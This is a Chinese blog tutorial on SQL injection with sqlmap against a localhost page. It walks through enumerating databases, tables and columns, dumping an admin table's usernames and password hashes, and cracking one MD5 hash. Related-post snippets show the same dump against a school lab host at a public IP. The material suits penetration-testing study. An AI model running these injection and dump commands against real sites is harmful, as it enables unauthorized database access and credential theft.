sqlmap之(四)----Mysql注入实战

最新推荐文章于 2023-05-06 09:11:18 发布
最新推荐文章于 2023-05-06 09:11:18 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Sqlmap

(1) 查找数据库

[html]  view plain  copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs  

数据库有8个

(2) 通过第一步的数据库查找表(假如数据库名为test)

[html]  view plain  copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables  

猜解出来里面存在admin,sqltest两个表。


(3) 通过2中的表得出列名(假如表为admin)

[html]  view plain  copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns  

爆出字段有有“user、id、pwd”

(4) 获取字段的值(假如扫描出id,user,pwd字段)

[html]  view plain  copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump  


do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

你想存储的哈希值来与其他工具最终进一步处理临时文件?   输入"Y"

do you want to crack them via a dictionary-based attack? [Y/n/q]

你想通过基于字典的攻击来破解他们吗?  输入"N"

马上就得到了用户名


与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"

lixue20141529
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞原理MySql注入 Windows中Sqlmap 工具的使用
qq_56248592的博客
01-28 719
漏洞利用:如果SQLmap检测到目标存在SQL注入漏洞,可以利用该漏洞执行各种操作,如获取数据库信息、执行系统命令、上传文件等。测试目标:使用SQLmap对目标进行测试,工具会检测是否存在SQL注入漏洞。6. 获取指定库指定表指定字段的值 # python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump。5. 获取当前数据库指定的表的字段名 # python sqlmap.py -u url -D 数据库名 -T 表名 --columns。
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
使用sqlmap对进行php+mysql注入实战
dfdhxb995397的博客
05-31 469
作者:陈小兵一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。 1.1php注入点的发现及扫描 1.使用漏洞扫描工具进行漏洞扫描 将目标url地址放在wvs中进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入,其漏洞存在的...
web安全[网易白帽子课程笔记+体会]-03web安全工具
u012489903的博客
07-30 1351
web安全-03web安全工具一、浏览器和浏览器拓展初级1、浏览器1.1、浏览器安全特性与设置1.2、开发者工具展示2、浏览器扩展2.1、如何获取插件2.2、firefox常用插件二、代理抓包分析工具1、代理工作原理 工欲善其事必先利其器 一、浏览器和浏览器拓展初级 1、浏览器 1.1、浏览器安全特性与设置 不同浏览器安全特性存在差异,同一漏洞触发效果可能不同。漏洞测试常用浏览器的开发者工具、高级设置、隐身模式、查看源码(view-source:url)、查看DOM元素等功能。 1.2、开发者工具展示
网络管理mysql实验总结_网络安全实验报告 第二章
weixin_28884205的博客
02-05 389
利用TCP协议实现synflood攻击运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态。利用xdos工具进行攻击首先在192.168.1.3的目标机器上打开wireshark,过滤出ip.dst=192.168.1.3的IP包。再在192.168.1.2的发动攻击的主机上输入命令:192.168.1.3 135 -t 3 -s 55.55.55.55。利用wireshar...
SQL注入漏洞攻防--sql labs
mackilo的博客
12-20 8103
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
SQLMap工具-1】SQLMap简介及简单应用实例
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 8515
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
sqlmap实战(靶机)
sweetie 的博客
09-10 1163
sqlmap攻击学校靶机 进入学校网页主页 随机点击 使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username” 遇到选择 do you want to crack them via a dictionary-based attack? [Y/n/q] Y do you want to use
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
sqlmap-wx-0.3.1.7z
01-29
gui版本
基于Springboot+Vue的墙绘产品展示交易平台毕业源码案例设计.zip
04-27
网络技术和计算机技术发展至今,已经拥有了深厚的理论基础,并在现实中进行了充分运用,尤其是基于计算机运行的软件更是受到各界的关注。加上现在人们已经步入信息时代,所以对于信息的宣传和管理就很关键。系统化是必要的,设计网上系统不仅会节约人力和管理成本,还会安全保存庞大的数据量,对于信息的维护和检索也不需要花费很多时间,非常的便利。 网上系统是在MySQL中建立数据表保存信息,运用SpringBoot框架和Java语言编写。并按照软件设计开发流程进行设计实现。系统具备友好性且功能完善。 网上系统在让售信息规范化的同时,也能及时通过数据输入的有效性规则检测出错误数据,让数据的录入达到准确性的目的,进而提升数据的可靠性,让系统数据的错误率降至最低。 关键词:vue;MySQL;SpringBoot框架 【引流】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
99-青海大学大数据中心建设分享.pptx
04-27
99-青海大学大数据中心建设分享.pptx
TD-LTE载波聚合方案.docx
04-27
5G通信行业、网络优化、通信工程建设资料。
10份网络优化创新案例.zip
最新发布
04-27
SA语音回落与切换流程冲突解决.pdf 计费模式错误导致SA语音承载建立失败,pdf BSF网元bug导致SA用户VOLTE业务故障,pdf SA基站SCTP偶联IP配置不规范导致切换失败的问题处理,pdf 第一医院SA+NSA双模基站方案保障5G查房车应用,pdf SA未配置互操作场景下终端语音业务研究案例,pdf SA站点天馈隔离度问题导致上行速率不及预期,pdf SA组网下微信小视频卡顿影响感知案例,pdf 基于八步法定位SA掉线问题.pdf SA站点测试宏微切换异常事件,pdf
sqlmap -r --dbs
09-03
你好!对于你的问题,`sqlmap -r --dbs` 是一个用于通过 SQL 注入检测和获取数据库信息的命令。它通常用于网络安全测试中。 `-r` 参数表示使用从请求文件中获取的数据进行注入测试。`--dbs` 参数表示获取数据库的名称。 请注意,我是一个聊天AI助手,无法执行实际的命令或运行代码。如果你有任何其他问题,我会很乐意回答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值